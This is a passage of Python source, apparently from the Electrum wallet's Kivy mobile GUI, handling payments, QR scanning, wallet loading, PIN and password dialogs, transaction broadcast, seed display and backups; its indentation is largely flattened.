description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / COIN
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = COIN * Decimal(fiat_amount) / Decimal(rate)
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str: str) -> Optional[int]:
if not amount_str:
return None
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
    '''Orientation of the window the app is running in.
    Can be one of `landscape` or `portrait`.
    :data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
    '''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
    '''
_init_finished = False
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
self._use_single_password = False
self.resume_dialog = None
App.__init__(self)#, **kwargs)
Logger.__init__(self)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', get_default_language())
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_gossip = config.get('use_gossip', False)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.set_fee_status()
self.invoice_popup = None
self.request_popup = None
self._init_finished = True
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data: str):
from electrum.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.set_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for name in ['send', 'history', 'receive']:
self.update_tab(name)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return self.scan_qr_non_android(on_complete)
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def scan_qr_non_android(self, on_complete):
from electrum import qrscanner
try:
video_dev = self.electrum_config.get_video_device()
data = qrscanner.scan_barcode(video_dev)
if data is not None:
on_complete(data)
except UserFacingException as e:
self.show_error(e)
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file(KIVY_GUI_PATH + '/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
self.logger.exception('crash on startup')
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
if self.network and self.electrum_config.get('auto_connect') is None:
self.popup_dialog("first_screen")
# load_wallet_on_start will be called later, after initial network setup is completed
else:
# load wallet
self.load_wallet_on_start()
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_success(self, storage, db, password):
self.password = password
if self.electrum_config.get('single_password'):
self._use_single_password = update_password_for_directory(self.electrum_config, password, password)
self.logger.info(f'use single password: {self._use_single_password}')
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
def on_wizard_aborted(self):
# wizard did not return a wallet; and there is no wallet open atm
if not self.wallet:
self.stop()
def load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
if self.password and self._use_single_password:
storage = WalletStorage(path)
# call check_password to decrypt
storage.check_password(self.password)
self.on_open_wallet(self.password, storage)
return
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
def load_wallet_on_start(self):
"""As part of app startup, try to load last wallet."""
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
def on_open_wallet(self, password, storage):
if not storage.file_exists():
wizard = InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.run('new')
else:
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
assert not db.requires_upgrade()
self.on_wizard_success(storage, db, password)
def on_stop(self):
self.logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
else:
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
if not self.wallet.has_lightning():
self.show_error(_('Lightning is not enabled for this wallet'))
return
if not self.wallet.lnworker.channels and not self.wallet.lnworker.channel_backups:
warning = _(messages.MSG_LIGHTNING_WARNING)
d = Question(_('Do you want to create your first channel?') +
'\n\n' + warning, self.open_channel_dialog_with_warning)
d.open()
else:
d = LightningOpenChannelDialog(self)
d.open()
def swap_dialog(self):
d = SwapDialog(self, self.electrum_config)
d.open()
def open_channel_dialog_with_warning(self, b):
if b:
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, wallet, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def is_wallet_creation_disabled(self):
return bool(self.electrum_config.get('single_password')) and self.password is None
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name, self.is_wallet_creation_disabled())
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name == 'lightning_channels_dialog' and not self.wallet.can_have_lightning():
self.show_error(_("Not available for this wallet.") + "\n\n" +
_("Lightning is currently restricted to HD wallets with p2wpkh addresses."))
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.send_screen = None
self.receive_screen = None
self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
self.logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
        # The main view of the activity might not have focus,
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.is_up_to_date() or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
balance_sat = c + u + x + l
text = self.format_amount(balance_sat)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.is_up_to_date():
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
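        # '!' tells make_unsigned_transaction to spend the maximum available amount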
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return self.electrum_config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if parse_max_spend(x):
return f'max({x})'
# FIXME this is using format_satoshis_plain instead of config.format_amount
# as we sometimes convert the returned string back to numbers,
# via self.get_amount()... the need for converting back should be removed
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_amount_and_units_with_fiat(self, x) -> str:
text = self.format_amount_and_units(x)
fiat = self.fx.format_amount_and_units(x) if self.fx else None
if text and fiat:
text += f' ({fiat})'
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.is_up_to_date() or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
            self.logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
if self.resume_dialog is not None:
return
now = time.time()
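        # require the PIN again if the app was paused for more than 5 minutes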
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
def on_success(x):
self.resume_dialog = None
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=self.stop)
self.resume_dialog = d
d.open()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, *, show_text_with_qr: bool = True):
if not label.data:
return
self.qr_dialog(label.name, label.data, show_text_with_qr)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble(text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
if amount == '!':
screen.is_max = True
max_amt = self.get_max_amount()
screen.amount = (max_amt + ' ' + self.base_unit) if max_amt else ''
else:
screen.amount = amount
screen.is_max = False
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
else:
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self):
from .uix.dialogs.fee_dialog import FeeDialog
fee_dialog = FeeDialog(self, self.electrum_config, self.set_fee_status)
fee_dialog.open()
def set_fee_status(self):
target, tooltip, dyn = self.electrum_config.get_fee_target()
self.fee_status = target
def on_fee(self, event, *arg):
self.set_fee_status()
def protected(self, msg, f, args):
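        # Ask for confirmation (and the PIN, when one is set) before calling f(*args, password).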
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except InvalidPassword:
self.show_error("Invalid password")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
# called if old_password works on self.wallet
self.password = new_password
if self._use_single_password:
path = self.wallet.storage.path
self.stop_wallet()
update_password_for_directory(self.electrum_config, old_password, new_password)
self.load_wallet_by_name(path)
msg = _("Password updated successfully")
else:
self.wallet.update_password(old_password, new_password)
msg = _("Password updated for {}").format(os.path.basename(self.wallet.storage.path))
self.show_info(msg)
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def pin_code_dialog(self, cb):
if self._use_single_password and self.has_pin_code():
def on_choice(choice):
if choice == 0:
self.change_pin_code(cb)
else:
self.reset_pin_code(cb)
choices = {0:'Change PIN code', 1:'Reset PIN'}
dialog = ChoiceDialog(
_('PIN Code'), choices, 0,
on_choice,
keep_choice_order=True)
dialog.open()
else:
self.change_pin_code(cb)
def reset_pin_code(self, cb):
on_success = lambda x: self._set_new_pin_code(None, cb)
d = PasswordDialog(self,
basename = self.wallet.basename(),
check_password = self.wallet.check_password,
on_success=on_success,
on_failure=lambda: None,
is_change=False,
has_password=self.wallet.has_password())
d.open()
def _set_new_pin_code(self, new_pin, cb):
self.electrum_config.set_key('pin_code', new_pin)
cb()
self.show_info(_("PIN updated") if new_pin else _('PIN disabled'))
def change_pin_code(self, cb):
on_failure = lambda: self.show_error(_("PIN not updated"))
on_success = lambda old_pin, new_pin: self._set_new_pin_code(new_pin, cb)
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
backup_dir = self.electrum_config.get_backup_dir()
if backup_dir:
self._save_backup(backup_dir)
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
try:
backup_dir = util.android_backup_dir()
except OSError as e:
self.logger.exception("Cannot save backup")
self.show_error(f"Cannot save backup: {e!r}")
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup(backup_dir))
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self, backup_dir):
try:
new_path = self.wallet.save_backup(backup_dir)
except Exception as e:
self.logger.exception("Failed to save wallet backup")
self.show_error("Failed to save wallet backup" + '\n' + str(e))
return
self.show_info(_("Backup saved:") + f"\n{new_path}")
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
